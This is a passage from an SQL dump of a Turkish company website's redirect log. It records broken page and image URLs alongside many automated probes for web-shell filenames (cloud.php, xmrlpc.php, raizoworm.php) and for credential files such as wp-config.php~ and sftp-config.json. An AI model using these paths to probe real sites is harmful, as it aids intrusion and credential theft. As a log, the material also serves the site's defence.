00:00:00',301),(32974,'http://3s-technologies.com.tr/tr/wp-admin/user/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:43','0000-00-00 00:00:00',301),(32975,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:44','0000-00-00 00:00:00',301),(32976,'http://3s-technologies.com.tr/tr/wp-admin/network/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:44','0000-00-00 00:00:00',301),(32977,'http://3s-technologies.com.tr/tr/wp-admin/images/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:45','0000-00-00 00:00:00',301),(32978,'http://3s-technologies.com.tr/tr/lock360.php',NULL,'','',413,0,'2023-08-18 08:32:45','0000-00-00 00:00:00',301),(32979,'http://3s-technologies.com.tr/tr/admin-heade.php',NULL,'','',13,0,'2023-08-18 08:32:46','0000-00-00 00:00:00',301),(32980,'http://3s-technologies.com.tr/tr/cgi-bin/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:46','0000-00-00 00:00:00',301),(32981,'http://3s-technologies.com.tr/tr/wp-content/xl2023.php',NULL,'','',3,0,'2023-08-18 08:32:46','0000-00-00 00:00:00',301),(32982,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/07/xl2023.php',NULL,'','',1,0,'2023-08-18 08:32:48','0000-00-00 00:00:00',301),(32983,'http://3s-technologies.com.tr/tr/ir7szrsouep.php',NULL,'','',30,0,'2023-08-18 08:32:48','0000-00-00 00:00:00',301),(32984,'http://3s-technologies.com.tr/tr/wp-content/uploads/xl2023.php',NULL,'','',3,0,'2023-08-18 08:32:48','0000-00-00 00:00:00',301),(32985,'http://3s-technologies.com.tr/en/++++++++++++++++++++++++++++++++++++++s/',NULL,'http://3s-technologies.com.tr/en/++++++++++++++++++++++++++++++++++++++s/','',1,0,'2023-08-18 22:24:50','0000-00-00 00:00:00',301),(32986,'https://3s-technologies.com.tr/en/wp-content/plugins/cache/cache.php',NULL,'www.google.com','',1,0,'2023-08-19 00:17:01','0000-00-00 00:00:00',301),(32987,'https://3s-technologies.com.tr/en/class.api.php',NULL,'www.google.com','',2,0,'2023-08-19 00:17:13','0000-00-00 00:00:00',301),(32988,'https://3s-technologies.com.tr/en/bala',NULL,'www.google.com','',1,0,'2023-08-19 00:17:27','0000-00-00 00:00:00',301),(32989,'https://3s-technologies.com.tr/en/xxl.php',NULL,'www.google.com','',2,0,'2023-08-19 00:17:33','0000-00-00 00:00:00',301),(32990,'http://3s-technologies.com.tr/tr/wp-config.php~',NULL,'','',4,0,'2023-08-21 03:09:03','0000-00-00 00:00:00',301),(32991,'http://3s-technologies.com.tr/en/wp-content/plugins/core-plugin/include.php',NULL,'www.google.com','',41,0,'2023-08-22 17:43:35','0000-00-00 00:00:00',301),(32992,'https://3s-technologies.com.tr/en/inputs.php',NULL,'www.google.com','',18,0,'2023-08-22 17:43:37','0000-00-00 00:00:00',301),(32993,'http://www.3s-technologies.com.tr/en/wp-content/plugins/core-plugin/include.php',NULL,'www.google.com','',2,0,'2023-08-24 17:22:12','0000-00-00 00:00:00',301),(32994,'http://www.3s-technologies.com.tr/en/anti.php',NULL,'www.google.com','',1,0,'2023-08-24 17:22:20','0000-00-00 00:00:00',301),(32995,'https://3s-technologies.com.tr/tr/wood-processing-ah_ap-i_leme',NULL,'','',21,0,'2023-08-25 17:36:49','0000-00-00 00:00:00',301),(32996,'http://3s-technologies.com.tr/en/anti.php',NULL,'www.google.com','',4,0,'2023-08-26 21:01:42','0000-00-00 00:00:00',301),(32997,'https://3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',1,0,'2023-08-28 06:38:57','0000-00-00 00:00:00',301),(32998,'http://3s-technologies.com.tr/en/inputs.php',NULL,'www.google.com','',95,0,'2023-08-28 09:08:24','0000-00-00 00:00:00',301),(32999,'http://3s-technologies.com.tr/en/wp-content/inputs.php',NULL,'www.google.com','',11,0,'2023-08-28 09:08:26','0000-00-00 00:00:00',301),(33000,'https://3s-technologies.com.tr/en/wp-content/inputs.php',NULL,'www.google.com','',1,0,'2023-08-28 09:08:34','0000-00-00 00:00:00',301),(33001,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'','',1169,0,'2023-08-28 10:17:42','0000-00-00 00:00:00',301),(33002,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/cloud.php',NULL,'','',111,0,'2023-08-28 10:17:43','0000-00-00 00:00:00',301),(33003,'http://3s-technologies.com.tr/tr/wp-admin/network/cloud.php',NULL,'','',85,0,'2023-08-28 10:17:43','0000-00-00 00:00:00',301),(33004,'http://3s-technologies.com.tr/tr/cloud.php',NULL,'','',133,0,'2023-08-28 10:17:44','0000-00-00 00:00:00',301),(33005,'http://3s-technologies.com.tr/tr/cgi-bin/cloud.php',NULL,'','',35,0,'2023-08-28 10:17:44','0000-00-00 00:00:00',301),(33006,'http://3s-technologies.com.tr/tr/css/cloud.php',NULL,'','',97,0,'2023-08-28 10:17:45','0000-00-00 00:00:00',301),(33007,'http://3s-technologies.com.tr/tr/wp-admin/user/cloud.php',NULL,'','',104,0,'2023-08-28 10:17:45','0000-00-00 00:00:00',301),(33008,'http://3s-technologies.com.tr/tr/img/cloud.php',NULL,'','',71,0,'2023-08-28 10:17:45','0000-00-00 00:00:00',301),(33009,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/cloud.php',NULL,'','',72,0,'2023-08-28 10:17:46','0000-00-00 00:00:00',301),(33010,'http://3s-technologies.com.tr/tr/wp-admin/images/cloud.php',NULL,'','',107,0,'2023-08-28 10:17:46','0000-00-00 00:00:00',301),(33011,'http://3s-technologies.com.tr/tr/images/cloud.php',NULL,'','',75,0,'2023-08-28 10:17:47','0000-00-00 00:00:00',301),(33012,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/cloud.php',NULL,'','',103,0,'2023-08-28 10:17:47','0000-00-00 00:00:00',301),(33013,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/cloud.php',NULL,'','',72,0,'2023-08-28 10:17:48','0000-00-00 00:00:00',301),(33014,'http://3s-technologies.com.tr/tr/wp-admin/includes/cloud.php',NULL,'','',89,0,'2023-08-28 10:17:48','0000-00-00 00:00:00',301),(33015,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/cloud.php',NULL,'','',70,0,'2023-08-28 10:17:49','0000-00-00 00:00:00',301),(33016,'http://3s-technologies.com.tr/tr/wp-admin/cloud.php',NULL,'','',70,0,'2023-08-28 10:17:49','0000-00-00 00:00:00',301),(33017,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/about.php7',NULL,'','',79,0,'2023-08-28 10:17:51','0000-00-00 00:00:00',301),(33018,'http://3s-technologies.com.tr/tr/wp-admin/js/about.php',NULL,'','',210,0,'2023-08-28 10:17:52','0000-00-00 00:00:00',301),(33019,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php',NULL,'','',11,0,'2023-08-28 10:17:52','0000-00-00 00:00:00',301),(33020,'http://3s-technologies.com.tr/tr/wp-content/themes/applica/400.php',NULL,'','',3,0,'2023-08-28 10:17:52','0000-00-00 00:00:00',301),(33021,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/xmrlpc.php?p=',NULL,'','',19,0,'2023-08-28 10:17:53','0000-00-00 00:00:00',301),(33022,'http://3s-technologies.com.tr/tr/wp-admin/network/xmrlpc.php?p=',NULL,'','',19,0,'2023-08-28 10:17:54','0000-00-00 00:00:00',301),(33023,'http://3s-technologies.com.tr/tr/cgi-bin/xmrlpc.php?p=',NULL,'','',12,0,'2023-08-28 10:17:54','0000-00-00 00:00:00',301),(33024,'http://3s-technologies.com.tr/tr/css/xmrlpc.php?p=',NULL,'','',19,0,'2023-08-28 10:17:55','0000-00-00 00:00:00',301),(33025,'http://3s-technologies.com.tr/tr/wp-admin/user/xmrlpc.php?p=',NULL,'','',19,0,'2023-08-28 10:17:55','0000-00-00 00:00:00',301),(33026,'http://3s-technologies.com.tr/tr/img/xmrlpc.php?p=',NULL,'','',33,0,'2023-08-28 10:17:56','0000-00-00 00:00:00',301),(33027,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/xmrlpc.php?p=',NULL,'','',37,0,'2023-08-28 10:17:56','0000-00-00 00:00:00',301),(33028,'http://3s-technologies.com.tr/tr/wp-admin/images/xmrlpc.php?p=',NULL,'','',19,0,'2023-08-28 10:17:57','0000-00-00 00:00:00',301),(33029,'http://3s-technologies.com.tr/tr/images/xmrlpc.php?p=',NULL,'','',23,0,'2023-08-28 10:17:57','0000-00-00 00:00:00',301),(33030,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/xmrlpc.php?p=',NULL,'','',18,0,'2023-08-28 10:17:58','0000-00-00 00:00:00',301),(33031,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/xmrlpc.php?p=',NULL,'','',40,0,'2023-08-28 10:17:58','0000-00-00 00:00:00',301),(33032,'http://3s-technologies.com.tr/tr/wp-admin/includes/xmrlpc.php?p=',NULL,'','',18,0,'2023-08-28 10:17:59','0000-00-00 00:00:00',301),(33033,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/xmrlpc.php?p=',NULL,'','',22,0,'2023-08-28 10:17:59','0000-00-00 00:00:00',301),(33034,'http://3s-technologies.com.tr/tr/wp-admin/xmrlpc.php?p=',NULL,'','',18,0,'2023-08-28 10:18:00','0000-00-00 00:00:00',301),(33035,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/db.php?u',NULL,'','',39,0,'2023-08-28 10:18:01','0000-00-00 00:00:00',301),(33036,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/db.php?u',NULL,'','',35,0,'2023-08-28 10:18:02','0000-00-00 00:00:00',301),(33037,'http://3s-technologies.com.tr/tr/wp/wp-content/themes/pridmag/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:03','0000-00-00 00:00:00',301),(33038,'http://3s-technologies.com.tr/tr/wp/wp-content/themes/seotheme/mar.php',NULL,'','',3,0,'2023-08-28 10:18:04','0000-00-00 00:00:00',301),(33039,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/linkpreview/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:04','0000-00-00 00:00:00',301),(33040,'http://3s-technologies.com.tr/tr/wp/wp-content/themes/seotheme/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:05','0000-00-00 00:00:00',301),(33041,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/seoplugins/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:05','0000-00-00 00:00:00',301),(33042,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/seoplugins/mar.php',NULL,'','',3,0,'2023-08-28 10:18:05','0000-00-00 00:00:00',301),(33043,'http://3s-technologies.com.tr/tr/blog/wp-content/themes/pridmag/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:06','0000-00-00 00:00:00',301),(33044,'http://3s-technologies.com.tr/tr/blog/wp-content/themes/seotheme/mar.php',NULL,'','',3,0,'2023-08-28 10:18:06','0000-00-00 00:00:00',301),(33045,'http://3s-technologies.com.tr/tr/blog/wp-content/plugins/linkpreview/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:07','0000-00-00 00:00:00',301),(33046,'http://3s-technologies.com.tr/tr/blog/wp-content/themes/seotheme/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:07','0000-00-00 00:00:00',301),(33047,'http://3s-technologies.com.tr/tr/blog/wp-content/plugins/seoplugins/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:08','0000-00-00 00:00:00',301),(33048,'http://3s-technologies.com.tr/tr/blog/wp-content/plugins/seoplugins/mar.php',NULL,'','',3,0,'2023-08-28 10:18:08','0000-00-00 00:00:00',301),(33049,'http://3s-technologies.com.tr/tr/wordpress/wp-content/themes/pridmag/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:09','0000-00-00 00:00:00',301),(33050,'http://3s-technologies.com.tr/tr/wordpress/wp-content/themes/seotheme/mar.php',NULL,'','',3,0,'2023-08-28 10:18:09','0000-00-00 00:00:00',301),(33051,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/linkpreview/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:09','0000-00-00 00:00:00',301),(33052,'http://3s-technologies.com.tr/tr/wordpress/wp-content/themes/seotheme/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:10','0000-00-00 00:00:00',301),(33053,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/seoplugins/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:10','0000-00-00 00:00:00',301),(33054,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/seoplugins/mar.php',NULL,'','',3,0,'2023-08-28 10:18:11','0000-00-00 00:00:00',301),(33055,'http://3s-technologies.com.tr/tr/old/wp-content/themes/pridmag/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:11','0000-00-00 00:00:00',301),(33056,'http://3s-technologies.com.tr/tr/old/wp-content/themes/seotheme/mar.php',NULL,'','',3,0,'2023-08-28 10:18:12','0000-00-00 00:00:00',301),(33057,'http://3s-technologies.com.tr/tr/old/wp-content/plugins/linkpreview/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:12','0000-00-00 00:00:00',301),(33058,'http://3s-technologies.com.tr/tr/old/wp-content/themes/seotheme/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:13','0000-00-00 00:00:00',301),(33059,'http://3s-technologies.com.tr/tr/old/wp-content/plugins/seoplugins/db.php?u',NULL,'','',3,0,'2023-08-28 10:18:13','0000-00-00 00:00:00',301),(33060,'http://3s-technologies.com.tr/tr/old/wp-content/plugins/seoplugins/mar.php',NULL,'','',3,0,'2023-08-28 10:18:13','0000-00-00 00:00:00',301),(33061,'http://3s-technologies.com.tr/tr/wp-content/updates.php',NULL,'','',98,0,'2023-08-28 10:18:14','0000-00-00 00:00:00',301),(33062,'http://3s-technologies.com.tr/tr/wp-content/plugins/ccx/index.php',NULL,'','',7,0,'2023-08-28 10:18:15','0000-00-00 00:00:00',301),(33063,'http://3s-technologies.com.tr/tr/wp-content/plugins/raizo/raizoworm.php',NULL,'','',3,0,'2023-08-28 10:18:16','0000-00-00 00:00:00',301),(33064,'http://3s-technologies.com.tr/tr/wp-content/gecko-new.php',NULL,'','',3,0,'2023-08-28 10:18:16','0000-00-00 00:00:00',301),(33065,'http://3s-technologies.com.tr/tr/wp-admin/raizoworm.php',NULL,'','',3,0,'2023-08-28 10:18:17','0000-00-00 00:00:00',301),(33066,'http://3s-technologies.com.tr/tr/updates.php',NULL,'','',173,0,'2023-08-28 10:18:18','0000-00-00 00:00:00',301),(33067,'http://3s-technologies.com.tr/tr/libraries/legacy/updates.php',NULL,'','',67,0,'2023-08-28 10:18:18','0000-00-00 00:00:00',301),(33068,'http://3s-technologies.com.tr/tr/libraries/phpmailer/updates.php',NULL,'','',66,0,'2023-08-28 10:18:19','0000-00-00 00:00:00',301),(33069,'https://3s-technologies.com.tr/tr/templates/beez5/css/copyright.php',NULL,'https://3s-technologies.com.tr/templates/beez5/css/COPYRIGHT.php','',5,0,'2023-08-29 02:51:25','0000-00-00 00:00:00',301),(33070,'https://3s-technologies.com.tr/tr/media/system/js/\' f[o] \'',NULL,'https://3s-technologies.com.tr/media/system/js/\'+f[o]+\'','',4,0,'2023-08-29 02:51:52','0000-00-00 00:00:00',301),(33071,'https://3s-technologies.com.tr/tr/media/system/js/g',NULL,'https://3s-technologies.com.tr/media/system/js/g','',4,0,'2023-08-29 02:51:52','0000-00-00 00:00:00',301),(33072,'https://3s-technologies.com.tr/tr/locale.pl',NULL,'https://3s-technologies.com.tr/Locale.pl','',4,0,'2023-08-29 02:51:53','0000-00-00 00:00:00',301),(33073,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/include.php',NULL,'','',113,0,'2023-08-29 06:19:25','0000-00-00 00:00:00',301),(33074,'https://3s-technologies.com.tr/tr/aluminyum-i_leme-aluminum-processing',NULL,'','',22,0,'2023-08-30 15:23:21','0000-00-00 00:00:00',301),(33075,'http://3s-technologies.com.tr/en/wp-touch.js',NULL,'3s-technologies.com.tr','',1,0,'2023-08-30 15:37:26','0000-00-00 00:00:00',301),(33076,'http://3s-technologies.com.tr/tr/iezhujetcp',NULL,'','',1,0,'2023-08-31 08:08:18','0000-00-00 00:00:00',301),(33077,'https://3s-technologies.com.tr/en/wp-content/plugins/yyobang/mar.php',NULL,'www.google.com','',2,0,'2023-08-31 09:38:52','0000-00-00 00:00:00',301),(33078,'http://3s-technologies.com.tr/en/wp-content/plugins/press/wp-class.php',NULL,'www.google.com','',4,0,'2023-08-31 09:38:56','0000-00-00 00:00:00',301),(33079,'http://3s-technologies.com.tr/en/fm1.php',NULL,'www.google.com','',4,0,'2023-08-31 09:39:14','0000-00-00 00:00:00',301),(33080,'https://3s-technologies.com.tr/en/wp-head.php',NULL,'www.google.com','',10,0,'2023-08-31 09:39:20','0000-00-00 00:00:00',301),(33081,'https://mail.3s-technologies.com.tr/tr/wp-config.php',NULL,'','',4,0,'2023-09-01 19:38:38','0000-00-00 00:00:00',301),(33082,'http://3s-technologies.com.tr/en/azuogcpb.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-02 03:30:02','0000-00-00 00:00:00',301),(33083,'https://3s-technologies.com.tr/en/snfzesbx.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-02 03:30:04','0000-00-00 00:00:00',301),(33084,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css',NULL,'','',1,0,'2023-09-03 10:38:35','0000-00-00 00:00:00',301),(33085,'http://3s-technologies.com.tr/en/+++++++++++++++++++++++++++++++++++s',NULL,'http://3s-technologies.com.tr/en/+++++++++++++++++++++++++++++++++++s','',1,0,'2023-09-04 20:41:45','0000-00-00 00:00:00',301),(33086,'http://3s-technologies.com.tr/tr/wp-content/plugins/videowhisper-video-presentation/vp/translation.php',NULL,'','',1,0,'2023-09-05 04:56:11','0000-00-00 00:00:00',301),(33087,'http://mail.3s-technologies.com.tr/tr/sftp-config.json',NULL,'','',8,0,'2023-09-05 05:58:27','0000-00-00 00:00:00',301),(33088,'http://mail.3s-technologies.com.tr/tr/.vscode/sftp.json',NULL,'','',8,0,'2023-09-05 05:58:28','0000-00-00 00:00:00',301),(33089,'http://www.3s-technologies.com.tr/tr/simple.php',NULL,'','',19,0,'2023-09-05 19:10:58','0000-00-00 00:00:00',301),(33090,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan_8s.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spartan_8s.gif','',6,0,'2023-09-06 04:21:04','0000-00-00 00:00:00',301),(33091,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg','',3,0,'2023-09-06 04:29:04','0000-00-00 00:00:00',301),(33092,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif','',4,0,'2023-09-06 04:33:04','0000-00-00 00:00:00',301),(33093,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/t_mi300.jpg','',4,0,'2023-09-06 04:41:07','0000-00-00 00:00:00',301),(33094,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/center-comp-1-640x377.png',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/center-comp-1-640x377.png','',4,0,'2023-09-06 10:23:20','0000-00-00 00:00:00',301),(33095,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/center-comp-1-640x614.png',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/center-comp-1-640x614.png','',5,0,'2023-09-06 10:27:20','0000-00-00 00:00:00',301),(33096,'http://3s-technologies.com.tr/tr/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php',NULL,'','',1,0,'2023-09-06 12:17:54','0000-00-00 00:00:00',301),(33097,'https://3s-technologies.com.tr/en/templates/beez5/images/vm-preloader.gif',NULL,'https://3s-technologies.com.tr/templates/beez5/css/vmsite-ltr.css?vmver=1ca80efd','',4,0,'2023-09-06 13:56:54','0000-00-00 00:00:00',301),(33098,'https://3s-technologies.com.tr/tr/hakk1m1zda',NULL,'','',23,0,'2023-09-06 18:03:20','0000-00-00 00:00:00',301),(33099,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-20.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-20.gif','',9,0,'2023-09-06 23:09:24','0000-00-00 00:00:00',301),(33100,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-45va.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-45va.gif','',9,0,'2023-09-06 23:13:24','0000-00-00 00:00:00',301),(33101,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-25.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-25.jpg','',7,0,'2023-09-06 23:21:27','0000-00-00 00:00:00',301),(33102,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ls60v.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/ls60v.gif','',7,0,'2023-09-06 23:44:09','0000-00-00 00:00:00',301),(33103,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cs-40.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/cs-40.gif','',4,0,'2023-09-06 23:48:09','0000-00-00 00:00:00',301),(33104,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/le40v.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/le40v.jpg','',5,0,'2023-09-07 00:04:11','0000-00-00 00:00:00',301),(33105,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/t_mi300.jpg','',7,0,'2023-09-07 01:51:25','0000-00-00 00:00:00',301),(33106,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/lfs-1-photo.gif','',8,0,'2023-09-07 01:51:51','0000-00-00 00:00:00',301),(33107,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan_8s.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/spartan_8s.gif','',8,0,'2023-09-07 01:52:17','0000-00-00 00:00:00',301),(33108,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg','',7,0,'2023-09-07 01:53:05','0000-00-00 00:00:00',301),(33109,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_1-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_1-1024x724.jpg','',4,0,'2023-09-07 09:51:54','0000-00-00 00:00:00',301),(33110,'https://3s-technologies.com.tr/tr/inputs.php',NULL,'','',2,0,'2023-09-07 11:44:12','0000-00-00 00:00:00',301),(33111,'https://3s-technologies.com.tr/en/wp-content/plugins/core-plugin/about.php',NULL,'www.google.com','',1,0,'2023-09-07 13:37:13','0000-00-00 00:00:00',301),(33112,'http://3s-technologies.com.tr/tr/language/en-gb/en-gb.com_acym.ini',NULL,'','',27,0,'2023-09-07 20:41:56','0000-00-00 00:00:00',301),(33113,'http://3s-technologies.com.tr/tr/media/com_acym/css/libraries/foundation_email.min.css',NULL,'','',29,0,'2023-09-07 20:41:57','0000-00-00 00:00:00',301),(33114,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/le40v.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/le40v.jpg','',8,0,'2023-09-08 04:11:27','0000-00-00 00:00:00',301),(33115,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ls60v.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/ls60v.gif','',5,0,'2023-09-08 04:12:40','0000-00-00 00:00:00',301),(33116,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cs-40.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/cs-40.gif','',5,0,'2023-09-08 04:13:29','0000-00-00 00:00:00',301),(33117,'https://3s-technologies.com.tr/tr/akrilik-i_leme-acrylic-processing',NULL,'','',19,0,'2023-09-08 04:44:30','0000-00-00 00:00:00',301),(33118,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/rhii.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/rhii.jpg','',7,0,'2023-09-08 08:31:51','0000-00-00 00:00:00',301),(33119,'https://3s-technologies.com.tr/tr/ah_ap-i_leme-wood-processing-120cm',NULL,'','',21,0,'2023-09-08 23:54:31','0000-00-00 00:00:00',301),(33120,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/ess-310-left-400x464.jpg','',6,0,'2023-09-09 02:39:04','0000-00-00 00:00:00',301),(33121,'http://3s-technologies.com.tr/tr/wp-content/plugins/uploader/uploadify/uploadify.css',NULL,'','',1,0,'2023-09-10 04:05:22','0000-00-00 00:00:00',301),(33122,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/jvk.jpg','',2,0,'2023-09-10 08:20:06','0000-00-00 00:00:00',301),(33123,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_12.jpg','',2,0,'2023-09-10 08:21:46','0000-00-00 00:00:00',301),(33124,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rh6-400x300.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/rh6-400x300.jpg','',7,0,'2023-09-10 08:22:10','0000-00-00 00:00:00',301),(33125,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rhii.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/rhii.jpg','',4,0,'2023-09-10 08:23:00','0000-00-00 00:00:00',301),(33126,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_1.jpg','',2,0,'2023-09-10 08:23:52','0000-00-00 00:00:00',301),(33127,'https://3s-technologies.com.tr/tr/images/misc/temelelektronik_1-1024x724.jpg',NULL,'https://3s-technologies.com.tr/images/misc/TemelElektronik_1-1024x724.jpg','',6,0,'2023-09-10 20:49:42','0000-00-00 00:00:00',301),(33128,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/kopyas%C4%B1-gf-12ht.gif','',2,0,'2023-09-11 02:11:39','0000-00-00 00:00:00',301),(33129,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_ly8c.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/t_ly8c.jpg','',6,0,'2023-09-11 02:12:54','0000-00-00 00:00:00',301),(33130,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/rhii.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/rhii.jpg','',6,0,'2023-09-11 09:20:41','0000-00-00 00:00:00',301),(33131,'https://www.3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',2,0,'2023-09-11 10:00:28','0000-00-00 00:00:00',301),(33132,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/ajaxupload.js',NULL,'','',1,0,'2023-09-11 11:07:30','0000-00-00 00:00:00',301),(33133,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/center-comp-1-640x377.png',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/center-comp-1-640x377.png','',5,0,'2023-09-11 11:12:59','0000-00-00 00:00:00',301),(33134,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/center-comp-1-640x614.png',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/center-comp-1-640x614.png','',7,0,'2023-09-11 11:13:20','0000-00-00 00:00:00',301),(33135,'http://3s-technologies.com.tr/en/ahndqjeq.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-11 21:09:15','0000-00-00 00:00:00',301),(33136,'https://3s-technologies.com.tr/en/irrvubbh.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-11 21:09:20','0000-00-00 